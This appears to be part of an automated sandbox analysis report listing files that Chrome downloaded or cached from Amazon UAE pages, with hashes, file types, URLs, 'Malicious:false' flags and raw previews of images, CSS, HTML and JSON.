                                                                                                                                                                                                        SHA-512:122B990D87026299F84626EA1D58324647BF4C92F632A9C661B7BD13BCCAFA739AA17C6A05FA7EFA73C441472E6859132E21B4EB79F95249B7659A9C23C87CCB
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:.. . . . ............................................................................................................................................................................................................................................... . . . . . ................ . . . . . . . ............................................................................................... ... . . . . . . . ........... .... . . . . . . . .................. . . . . . . . . ........... ................................................................................ ............{"prefetchSuppressionReason":"CheckoutPrefetch:prefetch-pipedata:ZeroCustomerId"}....
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 180x200, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):13780
                                                                                                                                                                                                        Entropy (8bit):7.971724921889833
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:hYKZqmh9NTMkBgnyzx4DyNzJI6SXvbrtAR31641:hYxmDNTduW448HtADT1
                                                                                                                                                                                                        MD5:4E9D2B0ED203CDA876CCE77DCABE7DB2
                                                                                                                                                                                                        SHA1:B15510E6744FD3BD115E790A37933B9E45510F46
                                                                                                                                                                                                        SHA-256:24F0CAF5FFCC4F2DE6FDA3B585BEDE0D8DE8FEF3FDF0076C1A136BA88128716F
                                                                                                                                                                                                        SHA-512:3DE0CF9130551B89A7141AE5B43F18A81E1B55CFEEEB0580857389BE86148EBF7BA7F013DE201935529E9D1070EF6436C686AB7570A63813DB8D21B4C5E9B721
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*...........".............................................................!.1.."A#2Qa..qBR....C..$3brs........%4U..D..................................................!1..AQ.."aq..#2B......$4b..R............?..zZZZ.E....[~...R7(r..$......tA....).F4f.3?...Fu.pA.........1.@.0.qH..c.w.....e...a..3..|I....Y.~..Q....$Li^1...M...n.&..F.. ....._.Y8Yy.....SH..>b.;7..5..oO.@."2)..3..z.2L..n...o..Y.l.=..W:.....q2y.l.m.G.-.....,XV...`...+'.u.N..,{...q...R....Kn$..m^..Uu..S.$.1.`..Q/....I..H..h.`.....'_G.z.UA.~io..T.......?`N.d...l. ...>.E.O.\.WYM..o_..{.^y...I.i5C~!<N.X...!.04V.....}O.Y.8L.{$...)j..b>@.~.....7..=Gt.7.t9.a....J.q$..p..../........$.We~+9.+4._......T..6=...r...&....N.y7..!.F....].._.......<O6.d'u..bAT7.....h<o.....#..V-...,\......;.........~$...wa%C.PF...r_....j..d1O.n.TVF..Xn...g....#.I.h=0OnO
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 219x200, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):7347
                                                                                                                                                                                                        Entropy (8bit):7.947096958801787
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:LW3m5aJ34UaPDQWGrIPVnyg0rQPJ3vecEYVLDWTKy+HxH2:LW3m5TTDorIRvik3vzEYxW5+HV2
                                                                                                                                                                                                        MD5:A1618E2DBD660E5E0148A8AF60E6138F
                                                                                                                                                                                                        SHA1:40282B6CB047BAFD8F88973DD7B1C15906B735B2
                                                                                                                                                                                                        SHA-256:1D9BF1511006BD908CB4D88368EF9D850B33F21CCA29A5A7B446806D35EAB468
                                                                                                                                                                                                        SHA-512:F247F3AE41E8B18C3E8A6BB3A7850B28148909F7C89F1A593855CB257EA3EDABE93534162714DA4B4B38A5D253E11DCC80AED8F774F24A472138C7C45DEB7BDC
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://m.media-amazon.com/images/I/61r-8obHj2L._AC_SY200_.jpg
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."...............................................................!1.A."Qaq..2BR.....#br.s.$3S...4c.%.........................................................!1AQ.."aqr..#2....$3..R................?..Z...!.@....!.@....!.@............*..zd.p.?.D.[Rv.-|.?W...'c.....[..Zi58.5.sO+#ok....1>.8..p2.h\t..W?....Ff+.4..L..y...<.....f7.M._...$..o....ql.t.#..9..J...C...W.b..C.2....sX2...v..U}N."..l-.s.....3..5?...{....}.X\=....w<i..A.u.z...o..}M6%R*....,.....C...\.n.8<g...lA..Z......u.3........'..^.........ms.*..v=....a.c..,.N.H?..|...,.....*P{.B..8.. ..B... ..B... ..B...........$....er\c.....=....}....&...M*..o4.^......|...............q.g...RNG8?.s.s;S.....9.[.q..:c~..7j.{5w......'.x...n$..T9.....F..Q....h.../...q...1.h......S.3#...w...6..3...:p&$H(^.I.6m...?y.v...$.c...)....5c....`.@Z.Q..............%.i.o.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):43
                                                                                                                                                                                                        Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                        MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                        SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                        SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                        SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:258-1179333-9864664:XRRBVETR66S3T97BM5KF$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.295223.0%26id%3DXRRBVETR66S3T97BM5KF%26m%3D1%26sc%3Dcsa%3AbrowserQuiteFn%26pc%3D61628%26at%3D61628%26t%3D1723729136939%26csmtags%3Daui%7Caui%3Aaui_build_date%3A3.24.6-2024-08-09%7CmutObsYes%7Cnavbar%7CFWCIMEnabled%7Cfls-eu-amazon-ae%7CperfYes%7Cak_cdn_fr%7Cfy_cdn_mp%7Caui%3Asw%3Apage_proxy%3Ano_ctrl%7Ccsm-feature-touch-enabled%3Afalse%7CgwCFImgNoCache%7Cadblk_no%7CmutObsActive%7Cadrender%3A3221523e-c639-400a-a04d-789177f02209%7Cadrender%3AGateway%3Adesktop-ad-center-1%3Adesktop%7Cadrender%3Asafeframe%3A3221523e-c639-400a-a04d-789177f02209%7Cadrender%3Asafeframe%3AGateway%3Adesktop-ad-center-1%3Adesktop%7Cadrender%3A3221523e-c639-400a-a04d-789177f02209%3Acreativetemplatename%3Aimage%7Cadrender%3AGateway%3Adesktop-ad-center-1%3Adesktop%3Acreativetemplatename%3Aimage%7Cadrender%3A3221523e-c639-400a-a04d-789177f02209%3Acreativeid%3A577653937781864011%7Cadrender%3AGateway%3Adesktop-ad-center-1%3Adesktop%3Acreativeid%3A577653937781864011%7Cadrender%3A3221523e-c639-400a-a04d-789177f02209%3Aprogramid%3A1001%7Cadrender%3AGateway%3Adesktop-ad-center-1%3Adesktop%3Aprogramid%3A1001%7Caui%3Acss%3Anetwork%7Caui%3Ajs%3Anetwork%7CfourColumn%7CthreeColumnRevised%7CflexLayout%7CcssGridLayout%7Caui%3Asw%3Actrl_changed%7CbrowserQuiteFn%26viz%3Dvisible%3A5%26pty%3DGateway%26spty%3Ddesktop%26pti%3Ddesktop%26tid%3DXRRBVETR66S3T97BM5KF%26aftb%3D1%26lob%3D1:61628
                                                                                                                                                                                                        Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):43
                                                                                                                                                                                                        Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                        MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                        SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                        SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                        SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 400x400, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):11395
                                                                                                                                                                                                        Entropy (8bit):7.900504506758376
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:YFoKfC8FTMzA7MVHeIL4xoeGcH2zL4a4KVCK5GBQks4SzPYeV9S:u68xXGcH8L4a4KVtsez6
                                                                                                                                                                                                        MD5:1BC1451C4CAC3EA83E34C2C383EEF101
                                                                                                                                                                                                        SHA1:F93DFE6BA318BCC442D6C9B961E71CED93B04EF7
                                                                                                                                                                                                        SHA-256:ECB2398C5D0A7E58B133C795847455150F12C20C384F94A825CBA2C0680F8B95
                                                                                                                                                                                                        SHA-512:36B95A4208965CEB6A483CD4387571C4B15835AA48299733552B495EFA77FF09F0B564E9E81ED70C919DF7C5B7F19CE87C19B1AA883517FC752EE865929C504B
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF..........................................................................................................................................................."..........2.........................................................................}.....3.C<.e...%....................6.e.b|.....7...{.|.z.}..{.~..QgB._..,...........\W.<..O@.......y(..9.8ts.......Z.Ws...\!(......1......Z!....=.|...nU..&...u|..U..}.uh.v....'..e_....,........t.:@.....W....v....uk.Z.....~.h..`....O,.+....).....'....H.....tJ......)Wz..}p.....D............m.........U...=........|.Y\.DOJ....]!...KS.5..`........w<.........8u......'_M..[6tQ.............p.....a..5..T...G&.Q......p.....\r...9x......=.n....9pi.f.......r..H...............L\.^.E..\.J1u.-l....&....V..`...........G!....!..........*R'G".1Y..:..a..:I~|..M.g.........`.....E.C.q.H........-...b.W......#..GA-.X.|..7\<......)).1..............J...2ls.....j ...K.=-c3`........0.=..y..|..Z@.......e.........i..).h....)..Fv
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 480x440, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):8047
                                                                                                                                                                                                        Entropy (8bit):7.668638568832589
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:hoAzuI7k7qxL8NmlUPacaMLnfd+iIz4qz3yGgFr0imEyR2rDwgkRo:FiI7k7xszMLdfIz4qa5yR5Ro
                                                                                                                                                                                                        MD5:1CAF67F98316B0A794F348C973E28E9F
                                                                                                                                                                                                        SHA1:E41A3FD4731CAA6CDE101F4EC5DE83A6E614C7E0
                                                                                                                                                                                                        SHA-256:9184BAFF81B523FCCE9941FD796559E0A347D8921C70C5A19DE70B5E98992E3C
                                                                                                                                                                                                        SHA-512:73782148A5721B1AE2AC59ED3D5ACC091EC6A7D37B01C7BDB56922198C1AA5C0BC955C7985B53CB7C299A7F45F2DEC4FF1E762A6A103B505623B6917D1E38AD6
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........3................................................................`...............................Q*.....................9/..".GU.)=.....=..j~.a..7.K...s...o......................f(.E].Y....v..2{...Z.I...? ...................j{^..r.Tf.Rn..Q.............................7E.........................m..U&."...8:.......................pQ..Q/9!.....................Wk.MH....}@......................^.y.M.............................E..5........................?..Y..........................\.X......................6.8...z.f@....................*M......[t......................e.mx.\.t...Y....................W. ...n.,..?....+0...................k[...T.$RI.>.'M.V`....................eh.....^.C..4..s.......$M.#./.md................@..}..6......G.,.2...........w.5..(...X.......................Ct.a..y.=.Z.z..i;.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (1052)
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):1249
                                                                                                                                                                                                        Entropy (8bit):4.871132149627306
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:qZSm5kuVTnjQZY9xhhWHdBb/xdG4cV5FiWe:qZ7iiB491Gk
                                                                                                                                                                                                        MD5:AB126768E6A50318ED4D240903AAC24B
                                                                                                                                                                                                        SHA1:582407CADA35F833A8FCC66EDECAB6594A4A14FD
                                                                                                                                                                                                        SHA-256:4E90E5725D57B2C91F9CB4421F925DC222A14501256426B4B564939879ABF2CA
                                                                                                                                                                                                        SHA-512:61C69910BD8104DEA561876E6B1493B6809C994835DD8CA6A7E69C4BD5486E3284280B548179EBADB93D46DC553BA6B04D29049A8F4A70D7821CD4ECF491B8D7
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://images-eu.ssl-images-amazon.com/images/I/01rdVnPkgmL._RC%7C01CzAMryqJL.css_.css?AUIClients/ListsDesktopCartMoveToListAssets
                                                                                                                                                                                                        Preview:.create-list-form{margin-bottom:0}.wl-spacing-top-quad-large{margin-top:8.4rem}#create-list-back-navigation{padding-right:10px}#create-list-back-icon{margin-top:4px}./* ******** */..cldd-list-option-default{border-color:#D5D9D9!important;background-color:#EDFDFF;border-left-color:#007185!important}#cldd-popover-inner{width:max-content;min-width:200px;max-width:220px;max-height:220px;overflow-y:auto;overflow-x:hidden;border-bottom-left-radius:0;border-bottom-right-radius:0}#cldd-popover-inner li{position:relative}#cldd-popover-inner a{padding-left:10px}#cldd-popover-inner td{vertical-align:middle;padding:0}.cldd-list-privacy{display:block;line-height:1!important}#cldd-show-more-lists-content{padding-top:8px;margin-left:auto;margin-right:auto;margin-bottom:0;width:max-content}#cldd-plus-icon{vertical-align:middle;font-size:30px!important;margin-right:10px}#cldd-rich-content{padding-top:10px;padding-bottom:14px;padding-left:10px;padding-right:10px;border-top-left-radius:0;border-top-right
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:PNG image data, 440 x 440, 8-bit colormap, non-interlaced
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):45831
                                                                                                                                                                                                        Entropy (8bit):7.97707742637553
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:768:tsXUIEBdv1gEmK89KWuPPYi1nWCkflzFY7ieWRMuEvQ1HZUozRn9tokJM17MPVx5:tsHZq89XuoQWVFY7HWRjEvSTt9ttJMVm
                                                                                                                                                                                                        MD5:1C84CE885FF41DE006B4A4DC0E1863E5
                                                                                                                                                                                                        SHA1:E989AB4182AF2E0BC70630D985D1408913D0D808
                                                                                                                                                                                                        SHA-256:557AE587148D54F67321F9FD9545E9421ABD1EF2BB6A19774016EC5B06A66D5A
                                                                                                                                                                                                        SHA-512:5822C37AEC2065B28AAD3F0FE92FFA106E51F3E2B0113C6B63078A3CD0C61655AF500C49C2129D195E0A7CD428102B98C64E017735289D940E714567B4BE071D
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://m.media-amazon.com/images/G/39/electronic/kamja/Events/2024/BTS24/PH1/Nav/OFC/bts_ofc_11_highlighters_en._CB568181090_.png
                                                                                                                                                                                                        Preview:.PNG........IHDR.....................PLTE..U....7,.....S...........T.................V....=5.....R....A:........P....>7...!-<#/>.@8.90$E=!C;.2*..........O&2A.=2.6..:3....'6.......L.....M.p...w.8+...,MD..Y.3'.?6'I@..*.<3. 0..O..{........$.5*.-"...)4C2RJ.&..n...}.4,..N...A`W8YQ........w..._{tWumt...,$Hg_y....zevf...f.zZo^Pmf...m..[cniq{..........p.......}<ER......:UH................w.OdV......F\M......w.t,G:.....fn}n....z..]...x.......GOZ..o....TDS..0........k.;N>QZb.............'...u..........~.QJ.\.k............O.......I=..n!4.@..c....fUA...r..........2=J.................o..\..X..........nk....f.R......f;.l.....B4l{..V.....'....=Q..7.....Z3qa..kg.F.dQ.Ou..G.;6......|...^7[d...X.p..f...q.qJ]|.[..kH...b..q....<.{....go......K....&1.....ic.O.MAX....\.p6......I......).tE.;... .IDATx..Kn.H..A..........[.z..XAFL.2d.G...2........, ...v}...`..V./....t....XLX........s.Z,.\..a}........;.O.i.6....].b.\.h..O.V.=.....j..:;O.y'+.s..........9.....{..'V%....z.Xg98.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):43
                                                                                                                                                                                                        Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                        MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                        SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                        SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                        SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://fls-eu.amazon.com/1/batch/1/OP/A2VIGQ35RCS4UG:258-1179333-9864664:5BRA4F30RSYWBFPSHBR1$uedata=s:%2Fap%2Fuedata%3Fld%26v%3D0.295375.0%26id%3D5BRA4F30RSYWBFPSHBR1%26sc0%3Daui%3Asw%3Appft%3Acallback_ricb%26bb0%3D1091%26pc0%3D1271%26ld0%3D1271%26t0%3D1723729124541%26sc1%3Daui%3Asw%3Apage_proxy%3Arequest_feature_tags%26bb1%3D1271%26pc1%3D5285%26ld1%3D5285%26t1%3D1723729128555%26ctb%3D1:6301
                                                                                                                                                                                                        Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:HTML document, ASCII text
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):71
                                                                                                                                                                                                        Entropy (8bit):4.19644707821733
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:PouVIZxgRO5ZB1XbZ6iFi:haxUkZ3X96x
                                                                                                                                                                                                        MD5:6AAEF67381946BFC1DDACCA8CF7F6C36
                                                                                                                                                                                                        SHA1:E441BBA8B691AD0FFF0BCCB75974880018AB41D6
                                                                                                                                                                                                        SHA-256:73F8AE8C11DAA6AD905107970E55C3C64CD7133561E9E91E650AAB092BA7245E
                                                                                                                                                                                                        SHA-512:99039B90D4F3819EFB0A395D0DC810DEE1A56265D443D24D1C9BDF832EF9F95887E3C417253698A4F76EF176D0ACE6334905F4B7B4E6A8421D2F650B84255EC2
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://www.amazon.ae/rd/uedata?rid=0RPFFN4XC9JAK0QN8ZQ4&sid=258-1179333-9864664&rx=izPMkC0WIG+v5NEOFXQPdw
                                                                                                                                                                                                        Preview:<!DOCTYPE html><html><head><title>x</title></head><body></body></html>.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):29858
                                                                                                                                                                                                        Entropy (8bit):5.406482545473019
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:Fd3+dIq67FP9E3vFYwFToRr4TXBwgvBpqu4v5IPg4Ye+/jfrY6bV6akWvBir0/VE:FJOFGP9EfbTopAPALrqaBFbA/KzY
                                                                                                                                                                                                        MD5:4868406E70FFEB3F65EDC27CEC52303E
                                                                                                                                                                                                        SHA1:914795A31638DA08B8ACE1A2341F49E01E18F902
                                                                                                                                                                                                        SHA-256:33268C941BF609F84926B906B09837802790602861BCF9D2BF431722DF2CD3B0
                                                                                                                                                                                                        SHA-512:1D9690724CB35A27321540A828B8D880D5299A4D7684B21FDFAF441B7CA274DB27C19FCEF47F25479B3126DE1BA37EE5ADCA72317BC50ADB3C0539F1DB14EC26
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://www.amazon.ae/hz/rhf?currentPageType=ShoppingCart&currentSubPageType=Cart&excludeAsin=&fieldKeywords=&k=&keywords=&search=&auditEnabled=&previewCampaigns=&forceWidgets=&searchAlias=&cardJSPresent=true
                                                                                                                                                                                                        Preview:{"html":"\u003cdiv class\u003d\"rhf-border\"\u003e\u003cdiv id\u003d\"rhf-shoveler\"\u003e\u003c/div\u003e\u003cdiv class\u003d\"celwidget pd_rd_w-4bo6F content-id-amzn1.sym.cb2e421d-130c-4154-89f5-508ab5cbe603 pf_rd_p-cb2e421d-130c-4154-89f5-508ab5cbe603 pf_rd_r-QYBP0RSNSAYX1SQV8M6G pd_rd_wg-SuM4H pd_rd_r-20043d44-db99-42c9-a51c-9d53f6353b11 c-f\" cel_widget_id\u003d\"p13n-rvi_desktop-rvi_0\" data-csa-op-log-render\u003d\"\" data-csa-c-content-id\u003d\"amzn1.sym.cb2e421d-130c-4154-89f5-508ab5cbe603\" data-csa-c-slot-id\u003d\"desktop-rvi-1\" data-csa-c-type\u003d\"widget\" data-csa-c-painter\u003d\"p13n-rvi-cards\"\u003e\u003cscript\u003eif(window.mix_csa){window.mix_csa(\u0027[cel_widget_id\u003d\"p13n-rvi_desktop-rvi_0\"]\u0027, \u0027#CardInstancez6vWyo2VzeL4xKn34pAVnA\u0027)(\u0027mark\u0027, \u0027bb\u0027)}\u003c/script\u003e\n\u003cscript\u003eif(window.uet){window.uet(\u0027bb\u0027,\u0027p13n-rvi_desktop-rvi_0\u0027,{wb: 1})}\u003c/script\u003e\n\u003cstyle\u003e.p13n-sc-rvi
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 142x116, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):3471
                                                                                                                                                                                                        Entropy (8bit):7.885376944540429
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:TT0rJ4D0oATWUccnXPjxJW20iEri0paqUTjOZLbbopmO4AIeaGjgl7paS:Tu4eWU7XPO2VuiGaqajK38mOfN9iaS
                                                                                                                                                                                                        MD5:1CAA2353C503D23AAC8DA16011385268
                                                                                                                                                                                                        SHA1:847584959176FD212EDBA647C25E5B17B24F7779
                                                                                                                                                                                                        SHA-256:B2FB80D6CD94D2EC99F0603712CF6C382BCA44DC69891AB64CC5D24C62D99FE0
                                                                                                                                                                                                        SHA-512:709E790DF4747542DD1E7F70BA7442C97B12F7752B749166ED29DDEEB454A46C188FB111666D2D97B7DD6F9A102417329AB15874ECBEB7B5B79C3B83DFA16DB1
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://images-eu.ssl-images-amazon.com/images/G/39/electronics/store/kamja/WebQC/2021/TVs/Feb_Large_1x._SY116_CB659039472_.jpg
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."..............................................................!1A.."Qa..Rq...#2Bt.....34rs..5CDT...Sc....................................................!..1...."A.2BQaq...C................?...!..B...!..B...!..B...!..B...!..!GOJ.u=.L.. .SI#r....pvR6q.......W..^.....|.M..6O......N_ux=...[Q.%.W....2t..k..../f......v...u..f._uk....va...YO.Se.....i...L.w....=.q........H]../....s{.X....R_uh..:. ..n......&H...f...7)7.4..G...G..>.O...M.........t.~..c......'N..)....s{.....S{.6........eA.T.9..L.=Z.'7..q;.....i9.).}...N~.[.Z.'7..........8..4..yJhzWA]4t...gH.....d.\..*......._.r..H..4.'...8._..g..j.....g........g.=W.f...#.O..#K....5.j-......5.Lw..6.F.....+..2.0....|S-.>A.C!..iL.J.....#h.[6n..$B..y[.0....en......<N%.YW{....C.x5........yk..'q.3......."...$.,.E.&..8...P.Z.^...i.[@-nF=.}.\...z...T.C..
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:HTML document, ASCII text, with no line terminators
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):167
                                                                                                                                                                                                        Entropy (8bit):5.111279005374292
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:PouVIZxocJ+qlkGOcFSKPCxvZ60WaNXbZ6+3vLKXAhvGXI9F4:haxB0qlkGOqRGMJaNX96IvLKXAhdI
                                                                                                                                                                                                        MD5:C2076D9EB8087664920133620E56DA58
                                                                                                                                                                                                        SHA1:946566C37B1C622F0C9D5B603A3C2DD6DA393ADA
                                                                                                                                                                                                        SHA-256:075E99E9705C6718F9F73FD8214CB914207D723A8E4E5C763E11B72B9F820A8E
                                                                                                                                                                                                        SHA-512:66DBF81CBBA177BFA500037BA7D39913EE4828C6E6534FBC55D64258CFC3FA2D3C2C832F71823541EA3F86D5DF1363B1C998F24E8F385C996AF262139B17A979
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://images-eu.ssl-images-amazon.com/images/S/apesafeframe/ape/sf/desktop/sf-1.50.495da7df.html
                                                                                                                                                                                                        Preview:<!DOCTYPE html><html><head><style>body{background-color:transparent;margin:0;padding:0}</style></head><body> <script src="sf-1.50.16755e0b.js" ></script></body></html>
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (560)
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):22850
                                                                                                                                                                                                        Entropy (8bit):5.310742006440315
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:D25pTmt/w5MqCmT2yuER7oBJcj6bhAsoAFXE6X8g+KUyer1CPC3ei1ZQnGr:DHI2kQBGj6F7oAFXE6Xt+dyeBCPC3ei9
                                                                                                                                                                                                        MD5:BAF5426671F29B1217B5550FA9BDE7B8
                                                                                                                                                                                                        SHA1:8A588BC594DF4045EDEE10A07F2722B09C7325AF
                                                                                                                                                                                                        SHA-256:7685C328FE8BC4DBC0C5FC6CF3AD21E56ECCBD325542FFEFBD653327073219C6
                                                                                                                                                                                                        SHA-512:32F339DF56F026FB459A7A5F542ED52CE90986BC15B02D5469825EA60E0A95554042C05602A4FC5316736BC3481067E757E7EB0E840EF097A21FC385B9A1EB46
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
